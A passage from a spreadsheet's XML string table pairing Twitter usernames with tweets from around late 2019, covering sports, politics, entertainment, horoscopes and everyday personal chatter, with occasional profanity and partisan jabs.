    <t>@Last_KingShit @kennnndoll__ I thought the same shit man thinking the whole season just finna be on Netflix 😭😭😭😭😭😭😭😭😭</t>
  </si>
  <si>
    <t>lucyfurr_drag</t>
  </si>
  <si>
    <t>The Ellen controversy...see now here’s another controversy that I literally don’t understand I’m so dumb I have no clue what’s going on and I used to know all the tea😩</t>
  </si>
  <si>
    <t>Ghul_eh</t>
  </si>
  <si>
    <t>Today is just not my day. ANOTHER nail broke and it’s the same finger but on the other hand. 🙄</t>
  </si>
  <si>
    <t>Gladvillain</t>
  </si>
  <si>
    <t>@Terrance623 I'm just gonna totally jump ships here and say "Tarrance" is the only acceptable way to spell "Tarrance"</t>
  </si>
  <si>
    <t>indhu_nodm</t>
  </si>
  <si>
    <t>@Renurajkumar1 @Yuna_Chillz How about #ThankYouKandy or #ThankYouSandy? It is for entertaining us all through the season, standing by my boy #kavin and bringing his medal back to kavi just like he promised. #BiggBossTamil3</t>
  </si>
  <si>
    <t>canyonnews90210</t>
  </si>
  <si>
    <t>Businessman In Prison For Filing False Tax Returns https://t.co/lkEYamuNCv</t>
  </si>
  <si>
    <t>dooseybug</t>
  </si>
  <si>
    <t>@SaraCarterDC Correct but yet the media reports the democrat smear theory and not the truth</t>
  </si>
  <si>
    <t>957thegame</t>
  </si>
  <si>
    <t>🏈 TUNE-IN ALERT Don't miss @peter_king at 5pm when he joins @DamonBruce, @RattoIndy and the @thekolsky to talk all things 5-0 #49ers. LISTEN 🎧 https://t.co/gPsWGEOGT8 https://t.co/k455ykOuE1</t>
  </si>
  <si>
    <t>Scooter_McTurd</t>
  </si>
  <si>
    <t>@TheRealRooBus @vampireweekend @tameimpala @Tool @springsteen @LanaDelRey @thestrokes @trvisXX Wasn’t there a rumor of Cage the Elephant?</t>
  </si>
  <si>
    <t>trevorjohn112</t>
  </si>
  <si>
    <t>@milesSI are there going to be football manager 2020 book and pen so when I go and see my football team @MillwallFC I can do some tactics</t>
  </si>
  <si>
    <t>GordoExperiment</t>
  </si>
  <si>
    <t>@GGPokerOfficial 8 outs! Late to the party but I swear I didn’t cheat! [gordoexperiment]</t>
  </si>
  <si>
    <t>RomeoKidTv</t>
  </si>
  <si>
    <t>@jllevin79 We didn’t needed the points</t>
  </si>
  <si>
    <t>Muzzy_TXs</t>
  </si>
  <si>
    <t>GOP official indicted for human smuggling and sale of children in bizarre international fraud scheme https://t.co/zSlLY6wPw3</t>
  </si>
  <si>
    <t>Scottyblack5</t>
  </si>
  <si>
    <t>@Kaptain_Krispie Right crooked and ridiculous</t>
  </si>
  <si>
    <t>ErikarealGarcia</t>
  </si>
  <si>
    <t>Bruh I just got home this is the latest I’ve ever been home I’m soo terrified of when my parents wake up 😭 I don’t even want to go get my toothbrush upstairs 😰 this is why I avoid going out</t>
  </si>
  <si>
    <t>offroadcadillac</t>
  </si>
  <si>
    <t>Finally found the #funnelcakes #ChiefsKingdom https://t.co/3qLPIWxqnd</t>
  </si>
  <si>
    <t>CozyHominid</t>
  </si>
  <si>
    <t>@Ezioblur @BenWalke Uninstall and reinstall</t>
  </si>
  <si>
    <t>ErikDullea</t>
  </si>
  <si>
    <t>@PhilBerdecio @mtracey @nadimrabajille (1/2) Phil - I agree with your sentiment against interventionism. In my 30 years with the Navy, I wasn’t a fan of certain ops. However, Gabbard has been an apologist for Assad, and publicly doubted his use of chemical weapons against civilians. As a new legislator, she was</t>
  </si>
  <si>
    <t>LackingSaint</t>
  </si>
  <si>
    <t>@wyle_type the article-length response I'm writing to vaush's Problems With The Left steam (which I'm still working on, lol) will be covering a lot of this, but I keep seeing tweets like this and had to say something 😤</t>
  </si>
  <si>
    <t>MrChowParody</t>
  </si>
  <si>
    <t>Open a pack of gum, and suddenly everyone is your bestfriend.</t>
  </si>
  <si>
    <t>hopeospical</t>
  </si>
  <si>
    <t>Love the boys. Nearly 10,000 tickets sold https://t.co/hOaPg7CB7H</t>
  </si>
  <si>
    <t>SamVanivray</t>
  </si>
  <si>
    <t>@pantophobe I don't see anything out there these days except maybe super high priced that is plain metal (no teflon) AND has a handle you can hold without a potholder. But then there's the copper part, which is also only in high end stuff these days to make it heat better.</t>
  </si>
  <si>
    <t>RinHugs</t>
  </si>
  <si>
    <t>@Escap3st @NicoleTheLizard This is the first tweet I see</t>
  </si>
  <si>
    <t>CEJAYEL</t>
  </si>
  <si>
    <t>The #Ford of @TomChilton_ at Silverstone. Good luck this weekend @Motorbase ! #btcc https://t.co/IL99nXPKLz</t>
  </si>
  <si>
    <t>LinkedSupplyLS</t>
  </si>
  <si>
    <t>Take A Look whats on offer from Linked Supply . . .Click here to see https://t.co/FoVQLWlh0m #tweetuk #london #kent #surrey https://t.co/0mUKEeoonu</t>
  </si>
  <si>
    <t>WistastonLabour</t>
  </si>
  <si>
    <t>@ryan_brexit That's the point, all parties split, get a good deal put it to the people, give Labour members a free vote, take politics out of it, or we will never come back together as a country. My pref would be to negotiate a good deal and just leave but tory mess makes 2nd vote necessary</t>
  </si>
  <si>
    <t>Jenbear_au</t>
  </si>
  <si>
    <t>@timminchin As long as a Huntsman stays on the wall I'm fine with it. It's when they drop into your lap from the sun visor in the car that gets me.</t>
  </si>
  <si>
    <t>TIMMY_DARKO</t>
  </si>
  <si>
    <t>Photos that didn't make the cut from Ana's shoot but I thought looked dope. I'm gettn alil better 🤷🏽‍♂️ no? Alright i'll quit https://t.co/v4bwBANqpk</t>
  </si>
  <si>
    <t>Anthony45318773</t>
  </si>
  <si>
    <t>@DerReichsapfel_ Ahh that’s quite the bargain from das taxi . 43.69 can’t beat it.</t>
  </si>
  <si>
    <t>SocialPowerOne1</t>
  </si>
  <si>
    <t>U.S. abandons our Kurdish allies, basically leaving them to die after they fought ISIS alongside our troops for years in northern Syria after Trump's Turkey call https://t.co/5HJ9ShTuYS #Military https://t.co/xJf0iMEV0m</t>
  </si>
  <si>
    <t>drakebellosu</t>
  </si>
  <si>
    <t>@Piggles_354 @martinwtb_twit What mf do you know thats out here with a transparent garbage can to see garbage</t>
  </si>
  <si>
    <t>HeyJohnnyBoy27</t>
  </si>
  <si>
    <t>https://t.co/bxjBQfNy6a my favorite requiem mass that's not the Mozart Requiem. Durufle's setting of the Requiem is absolutely stunning. The In Paradisum movement comforts me in death's shadow.</t>
  </si>
  <si>
    <t>wiregooner</t>
  </si>
  <si>
    <t>@wazzaster @Fatbelly57 @WarringtonRLFC How come? Not too late to change your mind 👍🏼</t>
  </si>
  <si>
    <t>RescuesOnly</t>
  </si>
  <si>
    <t>Watch what happened at 7:04 in @themcfiles44's broadcast: SPECIAL MCFILES LIVE CAST- The Death of Rep. Elijah Cummings, 68, (D-MD) https://t.co/pMfRiQ20PZ</t>
  </si>
  <si>
    <t>RoanokeFireEMS</t>
  </si>
  <si>
    <t>The past two days our #25 Recruits have been working on different scenarios training on forcible entry. Here you see them on their final scenario working with a battering ram. #Roanokefireems https://t.co/rsvLRT1fYU</t>
  </si>
  <si>
    <t>Blink8533</t>
  </si>
  <si>
    <t>@AOC Well maybe people should stop breaking the law, but that's a little too much for your little brain to comprehend! https://t.co/f7d81UVImK</t>
  </si>
  <si>
    <t>NicolexxxMalice</t>
  </si>
  <si>
    <t>Trying on my new chainmail bikini for the first time. Gotta say, it’s pretty fun... https://t.co/7i9yo9Qem8</t>
  </si>
  <si>
    <t>JLangWood</t>
  </si>
  <si>
    <t>@ByronYork @NicolleDWallace @WSJopinion Man, having the summit at an @RealDonaldTrump property is even going to LOOK totally corrupt to the world. How do we hold our heads up?</t>
  </si>
  <si>
    <t>martha_again</t>
  </si>
  <si>
    <t>@mxrtharose sleeping bags in chet, looking up through the glass roof at the stars, getting fined for snoring too loudly in exam term - ah, the collegiate life</t>
  </si>
  <si>
    <t>KElNlNE</t>
  </si>
  <si>
    <t>Ok....... writing my e*say for real</t>
  </si>
  <si>
    <t>CastletonSports</t>
  </si>
  <si>
    <t>Anthony Martinez had nine catches for 115 yards as @CastletonFB fell to Maritime (N.Y.) Saturday afternoon. Read here | https://t.co/VgmDxMdqaT https://t.co/OHA5T5Ws2Z</t>
  </si>
  <si>
    <t>HollyCLoves</t>
  </si>
  <si>
    <t>@spy_wre The elderly</t>
  </si>
  <si>
    <t>wenlongli_ed</t>
  </si>
  <si>
    <t>A nice mapping of IoT standards from multiple bodies, and the authors hold a high expectation on them. It particularly raises the case of standards addressing the emergent in-home threats, as in #GIoT project by @leotanczt when I first heard of @notequaltech</t>
  </si>
  <si>
    <t>TitosSharar</t>
  </si>
  <si>
    <t>Trans Town Hall Attendee Says It’s “Violence” For CNN Host to Get Her Name Wrong - https://t.co/0vYC8UrtmU Clown world strikes again.</t>
  </si>
  <si>
    <t>Mrs_Xoke</t>
  </si>
  <si>
    <t>2 Americans among scientists who won Nobel Prize for medicine for finding out how cells use oxygen https://t.co/JPJdjuCYnR</t>
  </si>
  <si>
    <t>kcuck</t>
  </si>
  <si>
    <t>@Mr_rothschild_ @LewtonSerena5 I agree but what if they think farrage should be co-operating with the conservatives for brexit not just to increase his personal profile?</t>
  </si>
  <si>
    <t>CreativeCubProd</t>
  </si>
  <si>
    <t>https://t.co/6jHyxzOHtY Hope for the best, be prepared for the worst #LondonEye #BigBen #DoubleDeckerBus #LondonProtests #London #creativecub #ilfordhp5 #aubmakers #xrebellion #extinctionrebellion #protest #protestsigns #peacefulprotest #london #lambethbridge # https://t.co/ajHiPlgYha</t>
  </si>
  <si>
    <t>StoryKC</t>
  </si>
  <si>
    <t>Thank you to everyone who joined us for our @staglinfamilyvineyard wine dinner! Special thanks to @vinodiva Amber Mihna for presenting the stellar wines. Join us for our next wine dinner featuring Champagne &amp; Burgundy on Tuesday, October 29th. Menu at https://t.co/7Pxl4ZObqn https://t.co/ezVRxFPjyz</t>
  </si>
  <si>
    <t>Polliwog221</t>
  </si>
  <si>
    <t>@MSNBC @AllResistNews Yeah, nothing like them family values when the ship is capsizing.</t>
  </si>
  <si>
    <t>suave215</t>
  </si>
  <si>
    <t>I learned to hustle when I took that loss ya dig?!?</t>
  </si>
  <si>
    <t>DigiSBlueprint</t>
  </si>
  <si>
    <t>Early Retirement Extreme: The ten-year update Today, I'm pleased to present a guest article from one of my favorite money bloggers of all time: Jacob Lund Fisker. Fisker founded Early Retirement Extreme in 2007. It quickly became an influential v https://t.co/5bGTjSIgS2 https://t.co/2uQLG9fFNH</t>
  </si>
  <si>
    <t>wakuwakuboi</t>
  </si>
  <si>
    <t>Will you take the ear bud, fellas? https://t.co/Ek0fHBkbCg</t>
  </si>
  <si>
    <t>4KExoDJ</t>
  </si>
  <si>
    <t>💥Jordan Burgett live with Shaky Shawn October 31st at Karma Ultra Lounge in Des Moines, IA💥 🔑Text “Jordan” to 319-239-7548 for tickets and more information.🔑 🎟Tickets at: https://t.co/Hyn2YhQycj #DesMoines #Iowa #Midwest #Halloween #Party #Rave #EDM #HipHop #LiveMusic https://t.co/CCtD8k0Odd</t>
  </si>
  <si>
    <t>gilbert_lyrik</t>
  </si>
  <si>
    <t>@34Diablo @GhostRecon Put in your digital code for the season pass so it knows you got the gold edition and it will play</t>
  </si>
  <si>
    <t>UoICareerCenter</t>
  </si>
  <si>
    <t>Looking for your RSO to get sponsored? Apply for a grant from the Dad's Association by October 19 for anywhere from $500-$2,000 in funding for your RSO! Apply here: https://t.co/LQHydIpMPg https://t.co/0oi15GZFPR</t>
  </si>
  <si>
    <t>eczemasupport</t>
  </si>
  <si>
    <t>Hear and see young people’s experiences of #eczema https://t.co/LOOWZjUg5D via @AbiSKINS</t>
  </si>
  <si>
    <t>_JamesGtfo</t>
  </si>
  <si>
    <t>@Nick_x7 Well she’s married to a war criminal so yes</t>
  </si>
  <si>
    <t>Republican6365</t>
  </si>
  <si>
    <t>@RealGsPatton007 @AngelWarrior321 @RudyGiuliani It starts in #2014 and the facts blow away any argument! #CorruptObamaAdministration</t>
  </si>
  <si>
    <t>daryl_smalls11</t>
  </si>
  <si>
    <t>I didnt post my pups death on social media because A. I didn’t want people asking me 50 million times what happened and B. I don’t care for anyone to apologize to me especially when they don’t mean it.</t>
  </si>
  <si>
    <t>alv86756952</t>
  </si>
  <si>
    <t>@iFooYa What is the name of the movie?</t>
  </si>
  <si>
    <t>KayleeJensen16</t>
  </si>
  <si>
    <t>I listened to a video of myself laughing and I just wanna apologize to anyone who has every suffered through that in person. You definitely didn’t deserve it.</t>
  </si>
  <si>
    <t>griefminister01</t>
  </si>
  <si>
    <t>Too Bored to Pay Attention at School? | Amen Clinics https://t.co/Z8OLLel2DV</t>
  </si>
  <si>
    <t>SBarrBrisebois</t>
  </si>
  <si>
    <t>The army and their Taco Bell announcement. #videogame #stickoftruth #southpark #playstation4 #ps4 #PS4share https://t.co/DlXv92w18m</t>
  </si>
  <si>
    <t>sagedatasec</t>
  </si>
  <si>
    <t>Report: US Voting Machines Still Prone to Hacking https://t.co/pStjURApfw by @BnkInfoSecurity</t>
  </si>
  <si>
    <t>thatwhichiz</t>
  </si>
  <si>
    <t>@KatyMontgomerie @GirlzGotGuns @SapphoScribe @KittenBumble "...majority of the frustration seems to be towards them" Are you sure? #Terfisaslur .com POV a terf in my mentions How many men have lost their jobs/been banned on Twitter compared to women? How many men lose most of their friends irl for saying biosex matters politically?</t>
  </si>
  <si>
    <t>PrimeJCS</t>
  </si>
  <si>
    <t>Feel bad for Rosen, literally has no time to breathe in the pocket</t>
  </si>
  <si>
    <t>gomentum</t>
  </si>
  <si>
    <t>We are excited to announce that we’ve joined the International Alliance for Mobility Testing and Standardization with @SAEIntl , @TUVSUD , @AVL_List , @VelodyneLidar &amp; many others. We look forward to the collaboration to advance #mobility testing standards https://t.co/gowDEdkrVI</t>
  </si>
  <si>
    <t>JoelJoey391</t>
  </si>
  <si>
    <t>I've beaten the 'World Champion' quest in World's Biggest Picture Cross. It's free https://t.co/ycMZAdmx6C #WBPC https://t.co/CfCAI1o1U9</t>
  </si>
  <si>
    <t>AquilaNBA</t>
  </si>
  <si>
    <t>@Dom_2k Warriors top 4 seed and make it to WCF</t>
  </si>
  <si>
    <t>absoluteradio</t>
  </si>
  <si>
    <t>Alright? @benburrell here. After playing American Idiot yesterday and realising that it's still depressingly relevant, today's songs that is all about tracks that are still relevant. GO! https://t.co/X91xV4oiDH</t>
  </si>
  <si>
    <t>OrginalSangster</t>
  </si>
  <si>
    <t>No one ever wants to talk about how Brian from The Breakfast Club brought a gun to school</t>
  </si>
  <si>
    <t>Blacklit101</t>
  </si>
  <si>
    <t>@JustNikkiB Your house is about to smell like HEAVEN</t>
  </si>
  <si>
    <t>DrSandvika</t>
  </si>
  <si>
    <t>@Ajenebk @WhiteHouse Brooklyn way of putting thugs off😂. I’ve listened to @realDonaldTrump off-script talks, and like it or not, the man has consistency &amp; gets majority of problems solved. Carter, Reagan, Bushes, Clintons &amp; Abu Obama lied in your face very eloquently indeed. https://t.co/vdS7vENcxz</t>
  </si>
  <si>
    <t>WilliamPieper</t>
  </si>
  <si>
    <t>@SopanDeb The Chinese don’t like Freedom of Speech? Too bad. They shouldn’t be so fragile.</t>
  </si>
  <si>
    <t>TyeGancen</t>
  </si>
  <si>
    <t>@DSBellPatsFan @E2jr1 @BreitbartNews @realDonaldTrump Yes, they said Trump had a slim chance of winning, and he did. It's a gamble not a guarantee. If you had a 10% chance at winning a hand in poker you can still win but it's unlikely, and usually a stupid bet.</t>
  </si>
  <si>
    <t>sethgambee</t>
  </si>
  <si>
    <t>@geraldpayne25 @donholtmac @Cant_Read_Maps @OMidwinter @mark_georgiou @surgerysleeper @michellmybell1 @TedPerkins10 @Loriniowa @Y2Krashman @rachel7remnant @Denbar64 @LeannEAF @Lalanamour @BrandonCreek63 @heart3626 @DawnRLFreeman @TDude713 @commonsensejan @Simple_Shaman @Janetb172 @zalphaprime @2Cents69 @StandBackUp2 @Squirrely99 @DianWChain1 @orna_verum @robster16a @halcyondon @Thedukeistheman @Thagraysentinel @CarolCpmgasser @fasting39 @NRA_TacoBowl_MS @spudgun2 @Jesus_is_G_d @TertiusIII @FeatherEW @mostly_monkey @ellen5e @bonecollector48 @3rdViv @Phildidgee @C_82l @Catheri77148739 @bhaddiegrande @TheMuleFactor @magnedal @AislygnEliyan @dorthealynn Them pesky scientists and heir climate models.... haven’t been right. Not. Even. Once. But now we’re supposed to listen to AOC and a 16-year old? https://t.co/lZvcUKONJN</t>
  </si>
  <si>
    <t>KaUlukoa</t>
  </si>
  <si>
    <t>https://t.co/tDc51O43Th Ka Ulukoa is hosting Open Gyms for high school athletes (grades 9 - 12 only). With club tryouts right around the corner, it's a great way to get some touches prior to the big day. This… https://t.co/Svuwg2ggRG</t>
  </si>
  <si>
    <t>Renenenenee</t>
  </si>
  <si>
    <t>honestly i’m not actually mad i still love them, but it is fun screaming into the void</t>
  </si>
  <si>
    <t>YaFavAfrocan</t>
  </si>
  <si>
    <t>@haaydenstaaylor see, i believe 10 over is doable, this man was talking about 5 miles only!!! that’s wild!! if you gonna do it do it out of everyone else’s way lmaoo i go at least 7-10 over esp if i’m in front of everyone else cause the people behind you have to drive slower</t>
  </si>
  <si>
    <t>graco3wj</t>
  </si>
  <si>
    <t>@mrkraft @xeni Yeah-wasn’t it a build up if almost 2 years? The damn breaking when one of the arrested men decided to come clean.</t>
  </si>
  <si>
    <t>strayanimalsatx</t>
  </si>
  <si>
    <t>A stray chocolate Havana Brown female cat about 10 years old (ID# A806461) was picked up at 600 Tudor House Road in , 78660. Latest info: https://t.co/tURNbNY5RC https://t.co/XdIKh1PtR0</t>
  </si>
  <si>
    <t>RingDiddyy</t>
  </si>
  <si>
    <t>@Lordsome @Phqdez I was also never the worst player on the team chris</t>
  </si>
  <si>
    <t>xlibra259x</t>
  </si>
  <si>
    <t>@thebestgiver I’m here! Ready and waiting! $singstar925</t>
  </si>
  <si>
    <t>GabbaGabbaMeh</t>
  </si>
  <si>
    <t>I'm not sure I can ever forgive John Darnielle for writing "Matthew 25:21"</t>
  </si>
  <si>
    <t>kvltswingking</t>
  </si>
  <si>
    <t>@martyorm Thank god for that!</t>
  </si>
  <si>
    <t>OsmentBilly</t>
  </si>
  <si>
    <t>@absolutealyssa6 Great to hear that when I get free and have the extra money like to call you and spend some time with you</t>
  </si>
  <si>
    <t>drillmastermom</t>
  </si>
  <si>
    <t>@Jacopo_della_Q And then there were none.</t>
  </si>
  <si>
    <t>_aesirr</t>
  </si>
  <si>
    <t>@Chantastic_ HWIPS i’m trying to learn to be okay with labs sucking and one-takes being not that great~</t>
  </si>
  <si>
    <t>MayankGupta___</t>
  </si>
  <si>
    <t>@dailykos This is a wild thing for a [media/news/whatever tf you are] outlet to say. It's like saying "damn, we can't discriminate against people of color because we allowed people of color to vote on this, lets just look at what white people said about it and ignore the rest!"</t>
  </si>
  <si>
    <t>badgerbrogden</t>
  </si>
  <si>
    <t>Just picked this up Great fucking album from a great fucking band https://t.co/VojhAkGxnB</t>
  </si>
  <si>
    <t>SEPTA</t>
  </si>
  <si>
    <t>Rte 10: Service eastbound may experience delays of up to 10 minutes due to a medical emergency at 57th and Lansdowne Ave/</t>
  </si>
  <si>
    <t>SeattleEconomy</t>
  </si>
  <si>
    <t>Congratulations are in order to The Greater Seattle Business Association in the launch of Capitol Hill Business Alliance (CHBA)! We cant wait to see the kinds of resources and opportunities that will be provided to all Capitol Hill businesses @GSBA https://t.co/I4bybpk5Wr</t>
  </si>
  <si>
    <t>ArtistJamieRoxx</t>
  </si>
  <si>
    <t>Jamie's Brain. woke up like 1/2hr ago. Had a great idea for a painting. Got it sketched And that's great and all, but I also woke up with Pitbull's track Timber playing in my head. So yeah the hampsters spinning in there have their own thing I guess. https://t.co/6IoRaXcEtp</t>
  </si>
  <si>
    <t>dawgsports</t>
  </si>
  <si>
    <t>“They are an awful hybrid of Ohio State and Alabama fans- whiny entitlement with horrible Midwest fashion sense.” ...And That’s When I Knew I Hated Kentucky https://t.co/1mm7umeSFX https://t.co/lRco8ZXia9</t>
  </si>
  <si>
    <t>SeezBeez</t>
  </si>
  <si>
    <t>@LaboursBlackPLP I think “toe rag” is such an excellent way to describe some people that we should have a national movement in the United States to adopt it (with thanks to the UK), especially when it is uttered with such total contempt illustrating how effective it is. #FilthyPieceofToeRag</t>
  </si>
  <si>
    <t>Bluesgirl19Neil</t>
  </si>
  <si>
    <t>Biden snaps at reporter over Ukraine question, tells media to focus on Trump instead https://t.co/pHz6LYbahp</t>
  </si>
  <si>
    <t>CCIVoice</t>
  </si>
  <si>
    <t>Why You Need Innovation Capital — And How to Get It https://t.co/k6EHVByACC</t>
  </si>
  <si>
    <t>danborrello</t>
  </si>
  <si>
    <t>Gonna go be a responsible tweeter and watch this Netflix show before making a Brady comment. Meanwhile, this is great for Netflix...</t>
  </si>
  <si>
    <t>milky_berries</t>
  </si>
  <si>
    <t>When you smack your simbling and they go crying to there mom https://t.co/POVhtfMRrS</t>
  </si>
  <si>
    <t>7xSeventy</t>
  </si>
  <si>
    <t>Check out what I just added to my closet on Poshmark: DKNY Womens Narrow Double-Keeper Pant Belt M New. https://t.co/OwMqnwDOM5 via @poshmarkapp #shopmycloset</t>
  </si>
  <si>
    <t>markmcgeoghegan</t>
  </si>
  <si>
    <t>@lituainianach FoR thE MAnY</t>
  </si>
  <si>
    <t>Actorman123</t>
  </si>
  <si>
    <t>I just signed a petition to urge states to give EVERY voter a meaningful say in our presidential elections -- with National Popular Vote. Sign here: https://t.co/FuwW9d56VT</t>
  </si>
  <si>
    <t>PhillMustBe</t>
  </si>
  <si>
    <t>*Flips to the Dallas game* *Watches Green Bay walk in the end zone 3 seconds into watching*</t>
  </si>
  <si>
    <t>luvMJ4allmylife</t>
  </si>
  <si>
    <t>Unexpected changes on the home front likely catch you off guar... More for Aquarius https://t.co/GBsMoHr7xl</t>
  </si>
  <si>
    <t>uchihanadim</t>
  </si>
  <si>
    <t>I hope the people who spoilt power for other people fall down the stairs</t>
  </si>
  <si>
    <t>NearpodOliver</t>
  </si>
  <si>
    <t>https://t.co/tumfoqVDzh Listen to @watsonedtech discuss his 3D Approach to Managing Digital Resources in the classroom with @nearpod @edtechweb! We all know in it is hard to differentiate, distinguish and decide and Adam does a great job leading the charge in @shelbycountysch</t>
  </si>
  <si>
    <t>DirtyDonBlo</t>
  </si>
  <si>
    <t>Creating a less detailed and more flexible schedule works to y... More for Libra https://t.co/fnrHkyZzKO</t>
  </si>
  <si>
    <t>ajhanee_</t>
  </si>
  <si>
    <t>i hate the fact that i don’t have a mailbox in my complex smh.</t>
  </si>
  <si>
    <t>eleccross</t>
  </si>
  <si>
    <t>Played some Grindstone during my break and got my first 30+ combo! This game is so much fun!! (Although I did realize that, in my excitement, I forgot to wait to get the crown before finishing the level T_T) https://t.co/WkKw9ORybU</t>
  </si>
  <si>
    <t>dbahtila</t>
  </si>
  <si>
    <t>@agendiaaloys @thedevilsdefeat @mulvihill12 @CBCNews @hrw @CohenOnAfrica @UN @realDonaldTrump @EmmanuelMacron @AsstSecStateAF @AUC_MoussaFaki @AbcAmbaTV @VOAShaka @AgborNkonghoF @BBC_AudreyB @BBCAfrica brutality now back in France from African leaders how can French police see this n strand watch and one of will fire another for increasing the volume of brutality https://t.co/CcyThs2ozL</t>
  </si>
  <si>
    <t>dumbassluis</t>
  </si>
  <si>
    <t>@cobwebmess the “with my black friends” part…</t>
  </si>
  <si>
    <t>__tayym</t>
  </si>
  <si>
    <t>I think I’m the only one who doesn’t care to ask for an explanation from someone. Their energy tells me all I need to know.</t>
  </si>
  <si>
    <t>SamanthiSoori</t>
  </si>
  <si>
    <t>What’s even left to say? https://t.co/pxiQD6ulpc</t>
  </si>
  <si>
    <t>AndrewWalden94</t>
  </si>
  <si>
    <t>@KFCBarstool Down side is no more frank the tank rants about him</t>
  </si>
  <si>
    <t>Just911Operator</t>
  </si>
  <si>
    <t>Trying to make plans with @DispatcherDame and @911disbitch https://t.co/aJrg0SDQy0</t>
  </si>
  <si>
    <t>RyanWTSP</t>
  </si>
  <si>
    <t>Trop attendance: 32,178 for Game 4, a total of 73 less than yesterday. Two massive showings in St. Pete.</t>
  </si>
  <si>
    <t>_kingBEE</t>
  </si>
  <si>
    <t>I have threatened to stab but I ain’t ever stab anyone y’all crazy crazy 😂😂😂</t>
  </si>
  <si>
    <t>deborahbrooks14</t>
  </si>
  <si>
    <t>@BibRave Q6 I love Relay races! There is something so magical about being part of a team can't wait to do another one #bibchat #orangemud @orangemud</t>
  </si>
  <si>
    <t>woodhana</t>
  </si>
  <si>
    <t>@krazikali I was sick of mine being broken so I decided to tear it out myself (figuratively in a drawing) thinking it’d stop the falling pieces that kept severing my desires &amp; emotions ... I think it helped ...</t>
  </si>
  <si>
    <t>wusa9</t>
  </si>
  <si>
    <t>1.1 million folding knives recalled after failing to lock, cutting people https://t.co/q9iAKIfrzi</t>
  </si>
  <si>
    <t>haaqVlone</t>
  </si>
  <si>
    <t>@SamEdwardx they got a couple of the kids and beat them up</t>
  </si>
  <si>
    <t>JenStrongMcCon</t>
  </si>
  <si>
    <t>I'm excited about the new #NancyDrew. I always think twice about going into walk-in-freezers since that 1st Nancy Drew book of my mom's I read years ago... #fridayreads https://t.co/Hh3O4lmvN2</t>
  </si>
  <si>
    <t>RMUACHAD1Hky</t>
  </si>
  <si>
    <t>Buffalo capitalizes on the powerplay, 4-1 with 6:04 to go in the second.</t>
  </si>
  <si>
    <t>magnaniNupae</t>
  </si>
  <si>
    <t>Or- "for want of a [wife], the kingdom was lost" #8bitProverbs</t>
  </si>
  <si>
    <t>MattMelv</t>
  </si>
  <si>
    <t>@carland27488094 I suspect they're not that vindictive. With what they know, it's likely more, "We're going to put up with your sh*t, because we know you'll thank us in 5 years."</t>
  </si>
  <si>
    <t>TempoJosie</t>
  </si>
  <si>
    <t>@ladycpeachykeen i’m unfortunately short on posi memes and dog pics at the moment but ily and i hope things get better from here 💖</t>
  </si>
  <si>
    <t>Evomodum</t>
  </si>
  <si>
    <t>Today's Halloween movie selection is From Beyond. If you haven't seen it, don't look up anything. Just watch it. Pure batshit 80s sci-fi horror with plenty of scenes that'll make you go "what the fuck is even happening?" From the director of Re-Animator and just as weird. https://t.co/tjLtqlkSHl</t>
  </si>
  <si>
    <t>Chrisbcozy</t>
  </si>
  <si>
    <t>I’m the only one that don’t use playlists</t>
  </si>
  <si>
    <t>RossInsana</t>
  </si>
  <si>
    <t>@molly_knight If you’re not trying to pick up patterns or other team’s signs, then you’re not trying hard enough to win. It’s 100 percent legal to figure them out. Whether it’s from second or picking up trends in video beforehand</t>
  </si>
  <si>
    <t>MancMal</t>
  </si>
  <si>
    <t>With west turning a blind eye to what is happening in Palestine and Yemen and just wringing hands about the Kurds, makes me feel ashamed of my country and all other western countries</t>
  </si>
  <si>
    <t>cheechio</t>
  </si>
  <si>
    <t>@Squishysunchild @Baskimo1 @Martleymum @GMB @piersmorgan 2/2 Billions aren't going to die, but thousands will suffer. Those that will suffer are the least well off. Not the thousands of well off parents and toffee nosed University students who are at the forefront of hypocrisy attending these events.</t>
  </si>
  <si>
    <t>MMnotine</t>
  </si>
  <si>
    <t>@3YearLetterman @viggokatowicz @BernieSanders Shitlicks, If sports aren’t important, why do@you have the letter M in a basketball hoop?</t>
  </si>
  <si>
    <t>blue_leadership</t>
  </si>
  <si>
    <t>@amazonmusic @halsey Love her music, she is talented! I can't sing, but I have one of the hottest podcasts in my apartment complex! https://t.co/L3hXfL3cB3 #FridayMotivation</t>
  </si>
  <si>
    <t>interrowhimper</t>
  </si>
  <si>
    <t>@laurenweav Oh noooo. Not that far off on the time deafness though.</t>
  </si>
  <si>
    <t>stormieadams93</t>
  </si>
  <si>
    <t>@CashBastet Yep! This guy tried to get me to add a “girl” on Skype for proof and i asked for her Twitter because all models have twitter and he said she didn’t have one. Like these dudes are dumb as hell</t>
  </si>
  <si>
    <t>FraczekMarg75</t>
  </si>
  <si>
    <t>Had a client thank us for the dental care we give him. He expressed his appreciation for the quality of care we give him that he can't get elsewhere. This makes my job so worthwhile.</t>
  </si>
  <si>
    <t>DreaSrob</t>
  </si>
  <si>
    <t>Check out what I just added to my closet on Poshmark: Black floral off shoulder with straps dress.. https://t.co/hNEoB0zobe via @poshmarkapp #shopmycloset</t>
  </si>
  <si>
    <t>AustinKilgore3</t>
  </si>
  <si>
    <t>@daniel01559539 @dillondanis Ehh, long as the impact is real then I don’t see the problem lol</t>
  </si>
  <si>
    <t>benita_regardso</t>
  </si>
  <si>
    <t>@DrPrepper4 He's asking for an extension, I can't see UK leaving the eu soon</t>
  </si>
  <si>
    <t>CravenMoon</t>
  </si>
  <si>
    <t>@thecjpearson Revelation 21:8 But the cowardly, the unbelieving, the vile, the murderers, the sexually immoral, those who practice magic arts, the idolaters and all liars—they will be consigned to the fiery lake of burning sulfur. This is the second death.”</t>
  </si>
  <si>
    <t>thatburgergirl</t>
  </si>
  <si>
    <t>Boost and affirm your self-worth by rewarding yourself today. ... More for Libra https://t.co/730NUC3RAy</t>
  </si>
  <si>
    <t>acnavb</t>
  </si>
  <si>
    <t>@mayawiley @StephMillerShow Miller has got to got, a swift kick in the ass, right out the door.</t>
  </si>
  <si>
    <t>taurussavant</t>
  </si>
  <si>
    <t>@BSladeNow all I can say is that I hope that more favorable experiences and outcomes come your way - you're very much an influence and inspiration to so many !</t>
  </si>
  <si>
    <t>tezzer_J</t>
  </si>
  <si>
    <t>@brettmuddy73 @AGissara Won’t get done unless Syd agree to pick 14.</t>
  </si>
  <si>
    <t>MichaelMSmith9</t>
  </si>
  <si>
    <t>@realDonaldTrump Oh and...#DonaldBoneSpurs</t>
  </si>
  <si>
    <t>UnabashedMisfit</t>
  </si>
  <si>
